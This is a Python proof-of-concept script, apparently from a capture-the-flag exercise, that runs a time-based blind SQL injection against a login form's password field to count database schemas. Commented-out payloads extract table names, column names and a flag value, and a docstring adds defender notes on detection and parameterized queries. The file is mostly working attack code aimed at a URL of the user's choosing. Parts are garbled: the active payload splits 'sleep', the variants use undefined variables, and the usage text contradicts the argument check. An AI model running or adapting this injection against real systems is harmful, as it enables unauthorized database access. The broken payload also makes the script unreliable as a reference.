"""Time-based blind SQL injection probe against a login form (single-file PoC).

The script POSTs ``uname`` / ``passwd`` / ``submit`` form fields to the URL
given on the command line. The ``passwd`` value carries a conditional-delay
expression, and the wall-clock time of each request is used as a one-bit
answer to "is the number of rows in information_schema.schemata greater than
N?". A binary search over N in [1, 30] yields the schema count.

Notes for defenders, grounded in what this file sends:
  * Every probe is an HTTP POST whose ``passwd`` field contains the literal
    text ``information_schema`` and a delay call; both are rare in genuine
    credentials and make good WAF / log-search terms.
  * No headers are set, so the requests library's default User-Agent is used.
  * Probes are sequential, and a "true" answer depends on the response
    taking longer than the 5-second threshold tested below.
  * The probe relies on the form value reaching the SQL statement as text;
    bound (parameterized) query arguments remove that precondition.
"""

import requests
import sys
import time
import pdb


class Injection():
    """Holds the target URL and the schema count recovered by the probe."""

    def __init__(self):
        # Target endpoint; filled in by Usage() from the command line.
        self.url = ""
        # Result of InjectionSchemaNumber(); 0 until the search has run.
        self.schemataNum = 0

    def InjectionSchemaNumber(self):
        """Binary-search the schema count using response latency as the oracle.

        Each iteration sends one POST and compares the elapsed whole seconds
        with 5. A longer response is read as "count > probe" and moves the
        lower bound up; anything else moves the upper bound down. The result
        is stored in ``self.schemataNum``; nothing is returned.

        Request errors are printed and the iteration still falls through to
        the timing comparison.
        """
        lo, hi = 1, 30
        probe = (lo + hi) // 2

        while lo < hi:
            # Payload text is reproduced exactly as it appears in the source.
            # Database (schema) count:
            payload = f"1' or if((select count(schema_name) from information_schema.schemata)>{probe},sle ep(5),0)-- +"
            # Unused variants kept from the original; they reference a
            # character index `i` that this file never defines.
            # Table names:
            #payload = f"1'or if(ascii(substr((seleCt(group_concat(table_name))from(information_schema. tables)where(table_schema)='note'),{i},1))>{mid},sleep(2),1)#"
            # Column names:
            #payload = f"1'or if(ascii(substr((seleCt(group_concat(column_name))from(information_schema .columns)where(table_name)='users'),{i},1))>{mid},sleep(2),1)#"
            # Row data:
            #payload = f"1'or if(ascii(substr((seleCt(flag)from(fl4g)),{i},1))>{mid},sleep(2),1)#"

            form = {
                "uname": "admin",
                "passwd": payload,
                "submit": "Submit",
            }

            # Timing is taken in whole seconds around the request.
            started = int(time.time())
            try:
                requests.post(self.url, data=form)
            except Exception as exc:
                print(exc)
            finally:
                finished = int(time.time())

            if finished - started > 5:
                lo = probe
            else:
                hi = probe
            probe = (lo + hi) // 2

            # Bounds are adjacent: the upper bound is the answer.
            if probe == lo and hi - lo == 1:
                self.schemataNum = hi
                return

        self.schemataNum = probe

    def Usage(self):
        """Read the target URL from argv, or print usage text and exit(-1).

        Exactly one argument (the URL) is accepted.
        NOTE(review): the printed example shows extra arguments after the
        URL, which does not match the single-argument check.
        """
        if len(sys.argv) == 2:
            self.url = sys.argv[1]
            return

        print('The number of parameter number not right')
        print(f'Usage:python3 {sys.argv[0]} url ')
        print("Example:python3 postInjection.py http://192.168.62.249/login.php username=admin&password=admin password")
        sys.exit(-1)


if __name__ == '__main__':
    # pdb.set_trace()
    inject = Injection()
    inject.Usage()
    inject.InjectionSchemaNumber()
    print(inject.schemataNum)